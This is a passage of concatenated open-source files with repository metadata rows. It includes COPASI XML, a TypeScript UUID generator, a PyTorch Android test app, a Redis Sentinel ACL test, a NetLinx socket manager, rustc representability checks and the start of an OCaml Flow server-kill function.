<SBMLMap SBMLid="ks1pds_p_p" COPASIkey="ModelValue_122"/>
<SBMLMap SBMLid="ks20_p" COPASIkey="ModelValue_123"/>
<SBMLMap SBMLid="ks20_p_p" COPASIkey="ModelValue_124"/>
<SBMLMap SBMLid="ks2pds_p_p" COPASIkey="ModelValue_125"/>
<SBMLMap SBMLid="ksb2_p" COPASIkey="ModelValue_126"/>
<SBMLMap SBMLid="ksb2_p_p" COPASIkey="ModelValue_127"/>
<SBMLMap SBMLid="ksb5_p" COPASIkey="ModelValue_128"/>
<SBMLMap SBMLid="ksb5_p_p" COPASIkey="ModelValue_129"/>
<SBMLMap SBMLid="ksbud" COPASIkey="ModelValue_130"/>
<SBMLMap SBMLid="ksc1_p" COPASIkey="ModelValue_131"/>
<SBMLMap SBMLid="ksc1_p_p" COPASIkey="ModelValue_132"/>
<SBMLMap SBMLid="kscdh" COPASIkey="ModelValue_133"/>
<SBMLMap SBMLid="ksf6_p" COPASIkey="ModelValue_134"/>
<SBMLMap SBMLid="ksf6_p_p" COPASIkey="ModelValue_135"/>
<SBMLMap SBMLid="ksf6_p_p_p" COPASIkey="ModelValue_136"/>
<SBMLMap SBMLid="ksn2_p" COPASIkey="ModelValue_137"/>
<SBMLMap SBMLid="ksn2_p_p" COPASIkey="ModelValue_138"/>
<SBMLMap SBMLid="ksnet" COPASIkey="ModelValue_139"/>
<SBMLMap SBMLid="ksori" COPASIkey="ModelValue_140"/>
<SBMLMap SBMLid="kspds_p" COPASIkey="ModelValue_141"/>
<SBMLMap SBMLid="ksppx" COPASIkey="ModelValue_142"/>
<SBMLMap SBMLid="ksspn" COPASIkey="ModelValue_143"/>
<SBMLMap SBMLid="ksswi_p" COPASIkey="ModelValue_144"/>
<SBMLMap SBMLid="ksswi_p_p" COPASIkey="ModelValue_145"/>
<SBMLMap SBMLid="lte1h" COPASIkey="ModelValue_146"/>
<SBMLMap SBMLid="lte1l" COPASIkey="ModelValue_147"/>
<SBMLMap SBMLid="mad2h" COPASIkey="ModelValue_148"/>
<SBMLMap SBMLid="mad2l" COPASIkey="ModelValue_149"/>
<SBMLMap SBMLid="mdt" COPASIkey="ModelValue_150"/>
<SBMLMap SBMLid="mu" COPASIkey="ModelValue_153"/>
<SBMLMap SBMLid="parameter_1" COPASIkey="ModelValue_172"/>
</SBMLReference>
</COPASI>
| Component Pascal | 5 | SzVarga/COPASI | TestSuite/events/EventTest12.cps | [
"Artistic-2.0"
] |
fileFormatVersion: 2
guid: d2983e2bca9a40398f287727dc0472a5
timeCreated: 1573242741 | Unity3D Asset | 0 | bobcy2015/ml-agents | com.unity.ml-agents/Tests/Editor/Sensor/RayPerceptionSensorTests.cs.meta | [
"Apache-2.0"
] |
/**
* Copied from https://github.com/lukeed/uuid
* https://github.com/lukeed/uuid/blob/master/src/secure.js
*/
import { randomBytes } from "crypto"
const SIZE = 4096
const HEX: Array<string> = []
let IDX = 0
let BUFFER: Buffer
for (; IDX < 256; IDX++) {
HEX[IDX] = (IDX + 256).toString(16).substring(1)
}
export function v4(): string {
if (!BUFFER || IDX + 16 > SIZE) {
BUFFER = randomBytes(SIZE)
IDX = 0
}
let i = 0
let tmp
let out = ``
for (; i < 16; i++) {
tmp = BUFFER[IDX + i]
if (i == 6) out += HEX[(tmp & 15) | 64]
else if (i == 8) out += HEX[(tmp & 63) | 128]
else out += HEX[tmp]
if (i & 1 && i > 1 && i < 11) out += `-`
}
IDX += 16
return out
}
| TypeScript | 4 | beingfranklin/gatsby | packages/gatsby-core-utils/src/uuid.ts | [
"MIT"
] |
package org.pytorch.testapp;
import android.content.Context;
import android.os.Bundle;
import android.os.Handler;
import android.os.HandlerThread;
import android.os.SystemClock;
import android.util.Log;
import android.widget.TextView;
import androidx.annotation.Nullable;
import androidx.annotation.UiThread;
import androidx.annotation.WorkerThread;
import androidx.appcompat.app.AppCompatActivity;
import java.io.File;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.InputStream;
import java.io.OutputStream;
import java.nio.FloatBuffer;
import org.pytorch.Device;
import org.pytorch.IValue;
import org.pytorch.MemoryFormat;
import org.pytorch.Module;
import org.pytorch.PyTorchAndroid;
import org.pytorch.Tensor;
public class MainActivity extends AppCompatActivity {
private static final String TAG = BuildConfig.LOGCAT_TAG;
private static final int TEXT_TRIM_SIZE = 4096;
private TextView mTextView;
protected HandlerThread mBackgroundThread;
protected Handler mBackgroundHandler;
private Module mModule;
private FloatBuffer mInputTensorBuffer;
private Tensor mInputTensor;
private StringBuilder mTextViewStringBuilder = new StringBuilder();
private final Runnable mModuleForwardRunnable =
new Runnable() {
@Override
public void run() {
final Result result = doModuleForward();
runOnUiThread(
new Runnable() {
@Override
public void run() {
handleResult(result);
if (mBackgroundHandler != null) {
mBackgroundHandler.post(mModuleForwardRunnable);
}
}
});
}
};
public static String assetFilePath(Context context, String assetName) {
File file = new File(context.getFilesDir(), assetName);
if (file.exists() && file.length() > 0) {
return file.getAbsolutePath();
}
try (InputStream is = context.getAssets().open(assetName)) {
try (OutputStream os = new FileOutputStream(file)) {
byte[] buffer = new byte[4 * 1024];
int read;
while ((read = is.read(buffer)) != -1) {
os.write(buffer, 0, read);
}
os.flush();
}
return file.getAbsolutePath();
} catch (IOException e) {
Log.e(TAG, "Error process asset " + assetName + " to file path");
}
return null;
}
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
if (BuildConfig.NATIVE_BUILD) {
final String modelFileAbsoluteFilePath =
new File(assetFilePath(this, BuildConfig.MODULE_ASSET_NAME)).getAbsolutePath();
LibtorchNativeClient.loadAndForwardModel(modelFileAbsoluteFilePath);
return;
}
setContentView(R.layout.activity_main);
mTextView = findViewById(R.id.text);
startBackgroundThread();
mBackgroundHandler.post(mModuleForwardRunnable);
}
protected void startBackgroundThread() {
mBackgroundThread = new HandlerThread(TAG + "_bg");
mBackgroundThread.start();
mBackgroundHandler = new Handler(mBackgroundThread.getLooper());
}
@Override
protected void onDestroy() {
stopBackgroundThread();
super.onDestroy();
}
protected void stopBackgroundThread() {
mBackgroundThread.quitSafely();
try {
mBackgroundThread.join();
mBackgroundThread = null;
mBackgroundHandler = null;
} catch (InterruptedException e) {
Log.e(TAG, "Error stopping background thread", e);
}
}
@WorkerThread
@Nullable
protected Result doModuleForward() {
if (mModule == null) {
final long[] shape = BuildConfig.INPUT_TENSOR_SHAPE;
long numElements = 1;
for (int i = 0; i < shape.length; i++) {
numElements *= shape[i];
}
mInputTensorBuffer = Tensor.allocateFloatBuffer((int) numElements);
mInputTensor =
Tensor.fromBlob(
mInputTensorBuffer, BuildConfig.INPUT_TENSOR_SHAPE, MemoryFormat.CHANNELS_LAST);
PyTorchAndroid.setNumThreads(1);
mModule =
BuildConfig.USE_VULKAN_DEVICE
? PyTorchAndroid.loadModuleFromAsset(
getAssets(), BuildConfig.MODULE_ASSET_NAME, Device.VULKAN)
: PyTorchAndroid.loadModuleFromAsset(getAssets(), BuildConfig.MODULE_ASSET_NAME);
}
final long startTime = SystemClock.elapsedRealtime();
final long moduleForwardStartTime = SystemClock.elapsedRealtime();
final Tensor outputTensor = mModule.forward(IValue.from(mInputTensor)).toTensor();
final long moduleForwardDuration = SystemClock.elapsedRealtime() - moduleForwardStartTime;
final float[] scores = outputTensor.getDataAsFloatArray();
final long analysisDuration = SystemClock.elapsedRealtime() - startTime;
return new Result(scores, moduleForwardDuration, analysisDuration);
}
static class Result {
private final float[] scores;
private final long totalDuration;
private final long moduleForwardDuration;
public Result(float[] scores, long moduleForwardDuration, long totalDuration) {
this.scores = scores;
this.moduleForwardDuration = moduleForwardDuration;
this.totalDuration = totalDuration;
}
}
@UiThread
protected void handleResult(Result result) {
String message = String.format("forwardDuration:%d", result.moduleForwardDuration);
mTextViewStringBuilder.insert(0, '\n').insert(0, message);
if (mTextViewStringBuilder.length() > TEXT_TRIM_SIZE) {
mTextViewStringBuilder.delete(TEXT_TRIM_SIZE, mTextViewStringBuilder.length());
}
mTextView.setText(mTextViewStringBuilder.toString());
}
}
| Java | 5 | Hacky-DH/pytorch | android/test_app/app/src/main/java/org/pytorch/testapp/MainActivity.java | [
"Intel"
] |
foo : ? -> Int
foo x = 42
| Idris | 2 | Qqwy/Idris2-Erlang | idris2/tests/idris2/basic005/NoInfer.idr | [
"BSD-3-Clause"
] |
source "../tests/includes/init-tests.tcl"
set ::user "testuser"
set ::password "secret"
proc setup_acl {} {
foreach_sentinel_id id {
assert_equal {OK} [S $id ACL SETUSER $::user >$::password +@all on]
assert_equal {OK} [S $id ACL SETUSER default off]
S $id CLIENT KILL USER default SKIPME no
assert_equal {OK} [S $id AUTH $::user $::password]
}
}
proc teardown_acl {} {
foreach_sentinel_id id {
assert_equal {OK} [S $id ACL SETUSER default on]
assert_equal {1} [S $id ACL DELUSER $::user]
S $id SENTINEL CONFIG SET sentinel-user ""
S $id SENTINEL CONFIG SET sentinel-pass ""
}
}
test "(post-init) Set up ACL configuration" {
setup_acl
assert_equal $::user [S 1 ACL WHOAMI]
}
test "SENTINEL CONFIG SET handles on-the-fly credentials reconfiguration" {
# Make sure we're starting with a broken state...
after 5000
catch {S 1 SENTINEL CKQUORUM mymaster} err
assert_match {*NOQUORUM*} $err
foreach_sentinel_id id {
assert_equal {OK} [S $id SENTINEL CONFIG SET sentinel-user $::user]
assert_equal {OK} [S $id SENTINEL CONFIG SET sentinel-pass $::password]
}
after 5000
assert_match {*OK*} [S 1 SENTINEL CKQUORUM mymaster]
}
test "(post-cleanup) Tear down ACL configuration" {
teardown_acl
}
| Tcl | 4 | hpdic/redis | tests/sentinel/tests/09-acl-support.tcl | [
"BSD-3-Clause"
] |
<?python
from textile import textile
from cgi import escape
?>
<div xmlns:py="http://purl.org/kid/ns#" >
<div py:for="post in posts">
<div id="post_$post.id">
<div id="entry_$post.id">
<div class="story">
<h1><a py:content="post.title" href="/${site.name}/blog/post/${post.permalink}" /></h1>
</div>
<div class="entrybody">
<p>
${ XML(textile(escape(post.text[:500]).encode('utf-8'), encoding='utf-8', output='utf-8'))}
<span py:if="len(post.text) > len(post.text[:500])">
<a href="/${site.name}/blog/post/${post.permalink}">Continue reading...</a><br/><br/>
</span>
</p>
</div>
<div class="entrymeta">
<div class="postinfo">
<span class="postedby" py:content="post.posted_by()" />
<span class="filedto"> on</span>
<span class="posteddate" py:content="post.posted_date('%B %d, %Y')"/> |
<span class="commentslink"><a href="/${site.name}/blog/post/${post.permalink}#comments">${post.number_of_comments()}</a></span> |
<span class="filedto"> Filed under</span>
<span py:for="tag in post.tags" >
<a title='${tag.name}' href='/${site.name}/blog/tags/${tag.name}'>${tag.name}</a>
</span>
</div>
<span py:if="'admin' in tg.identity.groups" class="commentslink"><a py:if="'admin' in tg.identity.groups" href="/${site.name}/blog/edit_post/${post.permalink}" >Edit</a></span>
</div>
</div>
</div>
<br/>
</div >
</div> | Genshi | 3 | CarlosGabaldon/calabro | calabro/widgets/templates/posts.kid | [
"MIT"
] |
Add client brotli compression support (optional with runtime check)
| Cucumber | 4 | adamko147/aiohttp | CHANGES/5219.feature | [
"Apache-2.0"
] |
PROGRAM_NAME='prime-connman-server'
#IF_NOT_DEFINED __PRIME_CONNMAN_SERVER
#DEFINE __PRIME_CONNMAN_SERVER
(***********************************************************)
(* FILE CREATED ON: 01/23/2016 AT: 21:43:16 *)
(***********************************************************)
(***********************************************************)
(***********************************************************)
(* FILE_LAST_MODIFIED_ON: 05/19/2016 AT: 17:39:08 *)
(***********************************************************)
(* FILE REVISION: Rev 2 *)
(* REVISION DATE: 04/15/2016 AT: 11:01:40 *)
(* *)
(* COMMENTS: *)
(* Corrected debug message function naming *)
(* *)
(***********************************************************)
(* System Type : NetLinx *)
(***********************************************************)
(* REV HISTORY: *)
(***********************************************************)
(*
$History: $
*)
(*
prime-connman-server
NetLinx IP Listening Socket Manager
Author: niek.groot@amxaustralia.com.au
No rights or warranties implied.
Usage:
#DEFINE CONNMAN_SERVER_SET_MAX_LEN_BUFFER_IN 1500 // Maximum size of the inbound buffer. Default: 2048.
#INCLUDE 'prime-connman-server' // Use connman_server_setProperty() to initialise configuration parameters
connman_server_open() // Open the listening socket
connman_server_close() // Close the listening socket
Response:
Strings received from the server are buffered in the
connman_server_buffer.in[CONNMAN_SERVER_MAX_LEN_BUFFER_IN] variable.
Configuration:
connman_server_setProperty('PORT', '<port>') // Listening port.
connman_server_setProperty('PROTOCOL', '<IP_TCP|IP_UDP>') // Transport protocol using NetLinx transport protocol constants.
connman_server_setProperty('AUTO_REOPEN', '<true|false>') // Automatically re-open the listening socket if it is closed. Default: true.
connman_server_setProperty('OPEN_DELAY', '<msec>') // Delay between attempts to open the listening socket. Default: 5000ms.
connman_server_reinitialize() // Re-initialise and open the listening socket if AUTO_REOPEN
*)
(***********************************************************)
(* CONSTANT DEFINITIONS GO BELOW *)
(***********************************************************)
DEFINE_CONSTANT
#IF_DEFINED CONNMAN_SERVER_SET_MAX_LEN_BUFFER_IN
integer CONNMAN_SERVER_MAX_LEN_BUFFER_IN = CONNMAN_SERVER_SET_MAX_LEN_BUFFER_IN;
#ELSE
integer CONNMAN_SERVER_MAX_LEN_BUFFER_IN = 2048;
#END_IF
long CONNMAN_SERVER_OPEN_TL = 1111;
integer CONNMAN_SERVER_STATUS_CLOSED = 0;
integer CONNMAN_SERVER_STATUS_OPENING = 1;
integer CONNMAN_SERVER_STATUS_OPEN = 2;
#IF_NOT_DEFINED __IP_PROTOCOL_STRINGS
#DEFINE __IP_PROTOCOL_STRINGS
char IP_PROTOCOL_STRINGS[3][8] = {
'TCP',
'UDP',
'UDP_2WAY'
}
#END_IF
(***********************************************************)
(* DATA TYPE DEFINITIONS GO BELOW *)
(***********************************************************)
DEFINE_TYPE
structure _connman_server_config {
integer protocol;
integer port;
}
structure _connman_server_buffer {
char in[CONNMAN_MAX_LEN_BUFFER_IN];
}
(***********************************************************)
(* VARIABLE DEFINITIONS GO BELOW *)
(***********************************************************)
DEFINE_VARIABLE
volatile integer connman_server_auto_reopen = true;
volatile _connman_server_config connman_server_config;
volatile _connman_server_buffer connman_server_buffer;
volatile long connman_server_open_times[] = { 0, 5000 }
volatile integer connman_server_open_status = CONNMAN_SERVER_STATUS_CLOSED;
(***********************************************************)
(* INCLUDES GO BELOW *)
(***********************************************************)
INCLUDE 'prime-debug';
(***********************************************************)
(* SUBROUTINE/FUNCTION DEFINITIONS GO BELOW *)
(***********************************************************)
define_function integer connman_server_setProperty(char key[], char value[]) {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_setProperty', '(', key, ', ', value, ')'");
switch (key) {
case 'PORT': {
connman_server_config.port = atoi(value);
}
case 'PROTOCOL': {
connman_server_config.protocol = atoi(value);
}
case 'OPEN_DELAY': {
connman_server_open_times[2] = atoi(value);
}
case 'AUTO_REOPEN': {
connman_server_auto_reopen = stringtobool(value);
}
default: {
return false;
}
}
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_setProperty', '() ', 'returning true'");
return true;
}
define_function connman_server_reinitialize() {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_reinitialize', '()'");
if (connman_server_open_status == CONNMAN_SERVER_STATUS_CLOSED) {
if (connman_server_auto_reopen) connman_server_open();
} else {
connman_server_close(); // connman_server_open() will be called automatically by offline event
}
}
define_function connman_server_open() {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_open', '()'");
if (!connman_server_config.port) {
if (AMX_INFO <= get_log_level()) debug(AMX_INFO, "'connman_server_open() ', 'listening port not configured'");
}
switch (connman_server_open_status) {
case CONNMAN_SERVER_STATUS_CLOSED: {
connman_server_open_status = CONNMAN_SERVER_STATUS_OPENING;
if (AMX_INFO <= get_log_level()) debug(AMX_INFO, "'connman_server_open() ', 'opening listening socket on port ', itoa(connman_server_config.port), ' ', IP_PROTOCOL_STRINGS[connman_server_config.protocol]");
ip_server_open(connman_server_device.port, connman_server_config.port, connman_server_config.protocol);
}
case CONNMAN_SERVER_STATUS_OPENING: {
// Already opening socket
}
case CONNMAN_SERVER_STATUS_OPEN: {
// Socket is already open
}
default: {
if (AMX_ERROR <= get_log_level()) debug(AMX_ERROR, "'connman_server_open', '() ', 'unexpected socket status!'");
}
}
}
define_function connman_server_close() {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_disconnect', '()'");
switch (connman_server_open_status) {
case CONNMAN_SERVER_STATUS_CLOSED: {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_disconnect', '() ', 'listening socket already closed'");
}
case CONNMAN_SERVER_STATUS_OPENING: {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_disconnect', '() ', 'cancelled attempt to open listening socket'");
if (timeline_active(CONNMAN_SERVER_OPEN_TL)) timeline_kill(CONNMAN_SERVER_OPEN_TL);
connman_server_open_status = CONNMAN_SERVER_STATUS_CLOSED;
}
case CONNMAN_SERVER_STATUS_OPEN: {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'connman_server_disconnect', '() ', 'closing listening socket...'");
ip_server_close(connman_server_device.port);
}
}
}
(***********************************************************)
(* STARTUP CODE GOES BELOW *)
(***********************************************************)
DEFINE_START
create_buffer connman_server_device, connman_server_buffer.in;
(***********************************************************)
(* THE EVENTS GO BELOW *)
(***********************************************************)
DEFINE_EVENT
data_event[connman_server_device] {
online: {
connman_server_open_status = CONNMAN_SERVER_STATUS_OPEN;
if (AMX_INFO <= get_log_level()) debug(AMX_INFO, "'listening socket opened on port ', itoa(connman_server_config.port), ' ', IP_PROTOCOL_STRINGS[connman_server_config.protocol]");
}
offline: {
connman_server_open_status = CONNMAN_SERVER_STATUS_CLOSED;
if (AMX_INFO <= get_log_level()) debug(AMX_INFO, "'listening socket on port ', itoa(connman_server_config.port), ' ', IP_PROTOCOL_STRINGS[connman_server_config.protocol], ' closed'");
if (connman_server_auto_reopen) connman_server_open();
}
onerror: {
if (AMX_ERROR <= get_log_level()) debug(AMX_ERROR, "'cculd not open listening socket on port ', itoa(connman_server_config.port), ' ', IP_PROTOCOL_STRINGS[connman_server_config.protocol], ' (Error ', itoa(data.number), ' ', ip_error_desc(type_cast(data.number)), ')'");
if (connman_server_open_status == CONNMAN_SERVER_STATUS_OPENING) {
timeline_create(CONNMAN_SERVER_OPEN_TL, connman_server_open_times, length_array(connman_server_open_times), TIMELINE_RELATIVE, TIMELINE_ONCE);
}
}
string: {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'string received from ', data.sourceip, ' on port ', itoa(connman_server_config.port), ' ', IP_PROTOCOL_STRINGS[connman_server_config.protocol], ' (', itoa(length_string(data.text)), ' bytes): ', data.text");
}
}
timeline_event[CONNMAN_SERVER_OPEN_TL] {
switch(timeline.sequence) {
case 1: {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'CONNMAN_SERVER_OPEN_TL', '(', itoa(timeline.repetition), ', ', itoa(timeline.sequence), ') ', 'opening listening socket in ', ftoa(connman_server_open_times[2] / 1000), ' seconds...'");
}
case 2: {
if (connman_server_open_status != CONNMAN_SERVER_OPEN_STATUS) {
if (AMX_DEBUG <= get_log_level()) debug(AMX_DEBUG, "'CONNMAN_SERVER_OPEN_TL', '(', itoa(timeline.repetition), ', ', itoa(timeline.sequence), ') ', 'opening listening socket on port ', itoa(connman_server_config.port), ' ', IP_PROTOCOL_STRINGS[connman_server_config.protocol]");
ip_server_open(connman_server_device.port, connman_server_config.port, connman_server_config.protocol);
}
}
}
}
#END_IF
| NetLinx | 4 | ajnavarro/language-dataset | data/github.com/avt-its-simple/amx-snmp-library/956bfc595de250af8789a80cc7cb635eb13a8151/prime-connman-server.axi | [
"MIT"
] |
@first-style: dashed;
.el0 { border-style: @first-style; }
| Less | 1 | joseconstela/meteor | tools/tests/apps/caching-less/subdir/nested-root.less | [
"Apache-2.0",
"BSD-2-Clause",
"MIT"
] |
//! Check whether a type is representable.
use rustc_data_structures::stable_map::FxHashMap;
use rustc_hir as hir;
use rustc_middle::ty::{self, Ty, TyCtxt};
use rustc_span::Span;
use std::cmp;
/// Describes whether a type is representable. For types that are not
/// representable, 'SelfRecursive' and 'ContainsRecursive' are used to
/// distinguish between types that are recursive with themselves and types that
/// contain a different recursive type. These cases can therefore be treated
/// differently when reporting errors.
///
/// The ordering of the cases is significant. They are sorted so that cmp::max
/// will keep the "more erroneous" of two values.
#[derive(Clone, PartialOrd, Ord, Eq, PartialEq, Debug)]
pub enum Representability {
Representable,
ContainsRecursive,
SelfRecursive(Vec<Span>),
}
/// Check whether a type is representable. This means it cannot contain unboxed
/// structural recursion. This check is needed for structs and enums.
pub fn ty_is_representable<'tcx>(tcx: TyCtxt<'tcx>, ty: Ty<'tcx>, sp: Span) -> Representability {
debug!("is_type_representable: {:?}", ty);
// To avoid a stack overflow when checking an enum variant or struct that
// contains a different, structurally recursive type, maintain a stack of
// seen types and check recursion for each of them (issues #3008, #3779,
// #74224, #84611). `shadow_seen` contains the full stack and `seen` only
// the one for the current type (e.g. if we have structs A and B, B contains
// a field of type A, and we're currently looking at B, then `seen` will be
// cleared when recursing to check A, but `shadow_seen` won't, so that we
// can catch cases of mutual recursion where A also contains B).
let mut seen: Vec<Ty<'_>> = Vec::new();
let mut shadow_seen: Vec<&'tcx ty::AdtDef> = Vec::new();
let mut representable_cache = FxHashMap::default();
let mut force_result = false;
let r = is_type_structurally_recursive(
tcx,
sp,
&mut seen,
&mut shadow_seen,
&mut representable_cache,
ty,
&mut force_result,
);
debug!("is_type_representable: {:?} is {:?}", ty, r);
r
}
// Iterate until something non-representable is found
fn fold_repr<It: Iterator<Item = Representability>>(iter: It) -> Representability {
iter.fold(Representability::Representable, |r1, r2| match (r1, r2) {
(Representability::SelfRecursive(v1), Representability::SelfRecursive(v2)) => {
Representability::SelfRecursive(v1.into_iter().chain(v2).collect())
}
(r1, r2) => cmp::max(r1, r2),
})
}
fn are_inner_types_recursive<'tcx>(
tcx: TyCtxt<'tcx>,
sp: Span,
seen: &mut Vec<Ty<'tcx>>,
shadow_seen: &mut Vec<&'tcx ty::AdtDef>,
representable_cache: &mut FxHashMap<Ty<'tcx>, Representability>,
ty: Ty<'tcx>,
force_result: &mut bool,
) -> Representability {
debug!("are_inner_types_recursive({:?}, {:?}, {:?})", ty, seen, shadow_seen);
match ty.kind() {
ty::Tuple(..) => {
// Find non representable
fold_repr(ty.tuple_fields().map(|ty| {
is_type_structurally_recursive(
tcx,
sp,
seen,
shadow_seen,
representable_cache,
ty,
force_result,
)
}))
}
// Fixed-length vectors.
// FIXME(#11924) Behavior undecided for zero-length vectors.
ty::Array(ty, _) => is_type_structurally_recursive(
tcx,
sp,
seen,
shadow_seen,
representable_cache,
ty,
force_result,
),
ty::Adt(def, substs) => {
// Find non representable fields with their spans
fold_repr(def.all_fields().map(|field| {
let ty = field.ty(tcx, substs);
let span = match field
.did
.as_local()
.map(|id| tcx.hir().local_def_id_to_hir_id(id))
.and_then(|id| tcx.hir().find(id))
{
Some(hir::Node::Field(field)) => field.ty.span,
_ => sp,
};
let mut result = None;
// First, we check whether the field type per se is representable.
// This catches cases as in #74224 and #84611. There is a special
// case related to mutual recursion, though; consider this example:
//
// struct A<T> {
// z: T,
// x: B<T>,
// }
//
// struct B<T> {
// y: A<T>
// }
//
// Here, without the following special case, both A and B are
// ContainsRecursive, which is a problem because we only report
// errors for SelfRecursive. We fix this by detecting this special
// case (shadow_seen.first() is the type we are originally
// interested in, and if we ever encounter the same AdtDef again,
// we know that it must be SelfRecursive) and "forcibly" returning
// SelfRecursive (by setting force_result, which tells the calling
// invocations of are_inner_types_representable to forward the
// result without adjusting).
if shadow_seen.len() > seen.len() && shadow_seen.first() == Some(def) {
*force_result = true;
result = Some(Representability::SelfRecursive(vec![span]));
}
if result == None {
result = Some(Representability::Representable);
// Now, we check whether the field types per se are representable, e.g.
// for struct Foo { x: Option<Foo> }, we first check whether Option<_>
// by itself is representable (which it is), and the nesting of Foo
// will be detected later. This is necessary for #74224 and #84611.
// If we have encountered an ADT definition that we have not seen
// before (no need to check them twice), recurse to see whether that
// definition is SelfRecursive. If so, we must be ContainsRecursive.
if shadow_seen.len() > 1
&& !shadow_seen
.iter()
.take(shadow_seen.len() - 1)
.any(|seen_def| seen_def == def)
{
let adt_def_id = def.did;
let raw_adt_ty = tcx.type_of(adt_def_id);
debug!("are_inner_types_recursive: checking nested type: {:?}", raw_adt_ty);
// Check independently whether the ADT is SelfRecursive. If so,
// we must be ContainsRecursive (except for the special case
// mentioned above).
let mut nested_seen: Vec<Ty<'_>> = vec![];
result = Some(
match is_type_structurally_recursive(
tcx,
span,
&mut nested_seen,
shadow_seen,
representable_cache,
raw_adt_ty,
force_result,
) {
Representability::SelfRecursive(_) => {
if *force_result {
Representability::SelfRecursive(vec![span])
} else {
Representability::ContainsRecursive
}
}
x => x,
},
);
}
// We only enter the following block if the type looks representable
// so far. This is necessary for cases such as this one (#74224):
//
// struct A<T> {
// x: T,
// y: A<A<T>>,
// }
//
// struct B {
// z: A<usize>
// }
//
// When checking B, we recurse into A and check field y of type
// A<A<usize>>. We haven't seen this exact type before, so we recurse
// into A<A<usize>>, which contains, A<A<A<usize>>>, and so forth,
// ad infinitum. We can prevent this from happening by first checking
// A separately (the code above) and only checking for nested Bs if
// A actually looks representable (which it wouldn't in this example).
if result == Some(Representability::Representable) {
// Now, even if the type is representable (e.g. Option<_>),
// it might still contribute to a recursive type, e.g.:
// struct Foo { x: Option<Option<Foo>> }
// These cases are handled by passing the full `seen`
// stack to is_type_structurally_recursive (instead of the
// empty `nested_seen` above):
result = Some(
match is_type_structurally_recursive(
tcx,
span,
seen,
shadow_seen,
representable_cache,
ty,
force_result,
) {
Representability::SelfRecursive(_) => {
Representability::SelfRecursive(vec![span])
}
x => x,
},
);
}
}
result.unwrap()
}))
}
ty::Closure(..) => {
// this check is run on type definitions, so we don't expect
// to see closure types
bug!("requires check invoked on inapplicable type: {:?}", ty)
}
_ => Representability::Representable,
}
}
fn same_adt<'tcx>(ty: Ty<'tcx>, def: &'tcx ty::AdtDef) -> bool {
match *ty.kind() {
ty::Adt(ty_def, _) => ty_def == def,
_ => false,
}
}
// Does the type `ty` directly (without indirection through a pointer)
// contain any types on stack `seen`?
fn is_type_structurally_recursive<'tcx>(
tcx: TyCtxt<'tcx>,
sp: Span,
seen: &mut Vec<Ty<'tcx>>,
shadow_seen: &mut Vec<&'tcx ty::AdtDef>,
representable_cache: &mut FxHashMap<Ty<'tcx>, Representability>,
ty: Ty<'tcx>,
force_result: &mut bool,
) -> Representability {
debug!("is_type_structurally_recursive: {:?} {:?}", ty, sp);
if let Some(representability) = representable_cache.get(ty) {
debug!(
"is_type_structurally_recursive: {:?} {:?} - (cached) {:?}",
ty, sp, representability
);
return representability.clone();
}
let representability = is_type_structurally_recursive_inner(
tcx,
sp,
seen,
shadow_seen,
representable_cache,
ty,
force_result,
);
representable_cache.insert(ty, representability.clone());
representability
}
fn is_type_structurally_recursive_inner<'tcx>(
tcx: TyCtxt<'tcx>,
sp: Span,
seen: &mut Vec<Ty<'tcx>>,
shadow_seen: &mut Vec<&'tcx ty::AdtDef>,
representable_cache: &mut FxHashMap<Ty<'tcx>, Representability>,
ty: Ty<'tcx>,
force_result: &mut bool,
) -> Representability {
match ty.kind() {
ty::Adt(def, _) => {
{
debug!("is_type_structurally_recursive_inner: adt: {:?}, seen: {:?}", ty, seen);
// Iterate through stack of previously seen types.
let mut iter = seen.iter();
// The first item in `seen` is the type we are actually curious about.
// We want to return SelfRecursive if this type contains itself.
// It is important that we DON'T take generic parameters into account
// for this check, so that Bar<T> in this example counts as SelfRecursive:
//
// struct Foo;
// struct Bar<T> { x: Bar<Foo> }
if let Some(&seen_adt) = iter.next() {
if same_adt(seen_adt, *def) {
debug!("SelfRecursive: {:?} contains {:?}", seen_adt, ty);
return Representability::SelfRecursive(vec![sp]);
}
}
// We also need to know whether the first item contains other types
// that are structurally recursive. If we don't catch this case, we
// will recurse infinitely for some inputs.
//
// It is important that we DO take generic parameters into account
// here, because nesting e.g. Options is allowed (as long as the
// definition of Option doesn't itself include an Option field, which
// would be a case of SelfRecursive above). The following, too, counts
// as SelfRecursive:
//
// struct Foo { Option<Option<Foo>> }
for &seen_adt in iter {
if ty::TyS::same_type(ty, seen_adt) {
debug!("ContainsRecursive: {:?} contains {:?}", seen_adt, ty);
return Representability::ContainsRecursive;
}
}
}
// For structs and enums, track all previously seen types by pushing them
// onto the 'seen' stack.
seen.push(ty);
shadow_seen.push(def);
let out = are_inner_types_recursive(
tcx,
sp,
seen,
shadow_seen,
representable_cache,
ty,
force_result,
);
shadow_seen.pop();
seen.pop();
out
}
_ => {
// No need to push in other cases.
are_inner_types_recursive(
tcx,
sp,
seen,
shadow_seen,
representable_cache,
ty,
force_result,
)
}
}
}
| Rust | 5 | mbc-git/rust | compiler/rustc_ty_utils/src/representability.rs | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] |
(*
* Copyright (c) Facebook, Inc. and its affiliates.
*
* This source code is licensed under the MIT license found in the
* LICENSE file in the root directory of this source tree.
*)
exception FailedToKill of string option
let mean_kill ~flowconfig_name ~tmp_dir root =
let pids =
try PidLog.get_pids (Server_files_js.pids_file ~flowconfig_name ~tmp_dir root) with
| PidLog.FailedToGetPids ->
let msg =
Printf.sprintf
"Unable to figure out pids of running Flow server. Try manually killing it with 'pkill %s' (be careful on shared devservers)"
Utils_js.exe_name
in
raise (FailedToKill (Some msg))
in
List.iter
(fun (pid, _) ->
